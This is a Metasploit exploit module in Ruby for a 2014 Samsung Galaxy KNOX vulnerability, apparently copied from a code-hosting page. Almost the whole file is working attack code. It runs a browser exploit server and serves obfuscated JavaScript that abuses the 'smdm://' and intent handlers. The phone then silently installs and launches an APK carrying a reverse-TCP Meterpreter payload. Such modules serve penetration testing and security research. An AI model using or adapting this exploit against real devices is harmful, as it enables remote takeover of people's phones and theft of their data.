Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'digest/md5'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ExcellentRanking
10

11
  include Msf::Exploit::Remote::BrowserExploitServer
12

13
  # Hash that maps payload ID -> (0|1) if an HTTP request has
14
  # been made to download a payload of that ID
15
  attr_reader :served_payloads
16

17
  def initialize(info = {})
18
    super(update_info(info,
19
      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
20
      'Description'         => %q{
21
        A vulnerability exists in the KNOX security component of the Samsung Galaxy
22
        firmware that allows a remote webpage to install an APK with arbitrary
23
        permissions by abusing the 'smdm://' protocol handler registered by the KNOX
24
        component.
25

26
        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
27
        and Ace 4.
28
      },
29
      'License'             => MSF_LICENSE,
30
      'Author'              => [
31
        'Andre Moulu', # discovery, advisory, and exploitation help
32
        'jduck', # msf module
33
        'joev'   # msf module
34
      ],
35
      'References'          => [
36
        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
37
        ['OSVDB', '114590']
38
      ],
39
      'Platform'            => 'android',
40
      'Arch'                => ARCH_DALVIK,
41
      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
42
      'Targets'             => [ [ 'Automatic', {} ] ],
43
      'DisclosureDate'      => '2014-11-12',
44
      'DefaultTarget'       => 0,
45

46
      'BrowserRequirements' => {
47
        :source     => 'script',
48
        :os_name    => OperatingSystems::Match::ANDROID
49
      }
50
    ))
51

52
    register_options([
53
      OptString.new('APK_VERSION', [
54
        false, "The update version to advertise to the client", "1337"
55
      ])
56
    ])
57

58
    deregister_options('JsObfuscate')
59
  end
60

61
  def exploit
62
    @served_payloads = Hash.new(0)
63
    super
64
  end
65

66
  def apk_bytes
67
    payload.encoded
68
  end
69

70
  def on_request_uri(cli, req)
71
    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
72
      if req.method.upcase == 'HEAD'
73
        print_status "Serving metadata..."
74
        send_response(cli, '', magic_headers)
75
      else
76
        print_status "Serving payload '#{$1}'..."
77
        @served_payloads[$1] = 1
78
        send_response(cli, apk_bytes, magic_headers)
79
      end
80
    elsif req.uri =~ /_poll/
81
      vprint_status("Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}")
82
      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
83
    elsif req.uri =~ /launch$/
84
      send_response_html(cli, launch_html)
85
    else
86
      super
87
    end
88
  end
89

90
  # The browser appears to be vulnerable, serve the exploit
91
  def on_request_exploit(cli, req, browser)
92
    print_status "Serving exploit..."
93
    send_response_html(cli, generate_html)
94
  end
95

96
  def magic_headers
97
    { 'Content-Length' => apk_bytes.length,
98
      'ETag' => Digest::MD5.hexdigest(apk_bytes),
99
      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
100
  end
101

102
  def generate_html
103
    %Q|
104
      <!doctype html>
105
      <html><body>
106
      <script>
107
      #{exploit_js}
108
      </script></body></html>
109
    |
110
  end
111

112
  def exploit_js
113
    payload_id = rand_word
114

115
    js_obfuscate %Q|
116

117
      function poll() {
118
        var xhr = new XMLHttpRequest();
119
        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
120
        xhr.onreadystatechange = function(){
121
          if (xhr.readyState == 4) {
122
            if (xhr.responseText == '1') {
123
              setTimeout(killEnrollment, 100);
124
            } else {
125
              setTimeout(poll, 1000);
126
              setTimeout(enroll, 0);
127
              setTimeout(enroll, 500);
128
            }
129
          }
130
        };
131
        xhr.onerror = function(){
132
          setTimeout(poll, 1000);
133
          setTimeout(enroll, 0);
134
        };
135
        xhr.send();
136
      }
137

138
      function enroll() {
139
        var loc = window.location.href.replace(/[/.]$/g, '');
140
        top.location = 'smdm://#{rand_word}?update_url='+
141
          encodeURIComponent(loc)+'/#{payload_id}.apk';
142
      }
143

144
      function killEnrollment() {
145
        top.location = "intent://#{rand_word}?program="+
146
          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
147
        setTimeout(launchApp, 300);
148
      }
149

150
      function launchApp() {
151
        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
152
      }
153

154
      enroll();
155
      setTimeout(poll,600);
156

157
    |
158
  end
159

160
  def rand_word
161
    Rex::Text.rand_text_alphanumeric(3+rand(12))
162
  end
163
end
164

165